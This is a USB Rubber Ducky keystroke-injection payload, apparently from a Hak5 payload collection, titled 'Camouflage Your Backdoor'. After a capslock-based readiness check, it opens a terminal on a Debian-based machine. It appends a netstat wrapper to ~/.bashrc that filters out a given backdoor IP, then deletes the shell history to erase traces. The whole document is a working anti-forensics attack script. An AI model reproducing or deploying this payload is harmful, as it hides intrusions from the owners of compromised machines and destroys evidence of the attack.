1
REM_BLOCK
2
#############################################
3
#                                           #
4
# Title        : Camouflage Your Backdoor   #
5
# Author       : Aleff                      #
6
# Version      : 1.0                        #
7
# Category     : Execution                  #
8
# Target       : Debian based using .bashrc #
9
#                                           #
10
#############################################
11
END_REM
12

13
REM Here the IP of the backdoor that is to be camouflaged
14
DEFINE #BACKDOOR_IP_TO_CAMOUF example
15

16
REM_BLOCK
17
    Credits:    Hak5 LLC
18
    Website:    https://hak5.org/
19
    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
20
END_REM
21

22
EXTENSION DETECT_READY
23
    REM VERSION 1.1
24
    REM AUTHOR: Korben
25

26
    REM_BLOCK DOCUMENTATION
27
        USAGE:
28
            Extension runs inline (here)
29
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
30
            boot delay
31

32
        TARGETS:
33
            Any system that reflects CAPSLOCK will detect minimum required delay
34
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
35
    END_REM
36

37
    REM CONFIGURATION:
38
    DEFINE #RESPONSE_DELAY 25
39
    DEFINE #ITERATION_LIMIT 120
40

41
    VAR $C = 0
42
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
43
        CAPSLOCK
44
        DELAY #RESPONSE_DELAY
45
        $C = ($C + 1)
46
    END_WHILE
47
    CAPSLOCK
48
END_EXTENSION
49

50
REM Open a shell
51
CTRL-ALT t
52
DELAY 1000
53

54
REM The script
55
STRINGLN_BASH
56
    echo "function netstat() {
57
        command netstat "$@" | grep -v #BACKDOOR_IP_TO_CAMOUF
58
    }
59
    " >> ~/.bashrc; rm $HISTFILE; exit
60
END_STRINGLN
61

62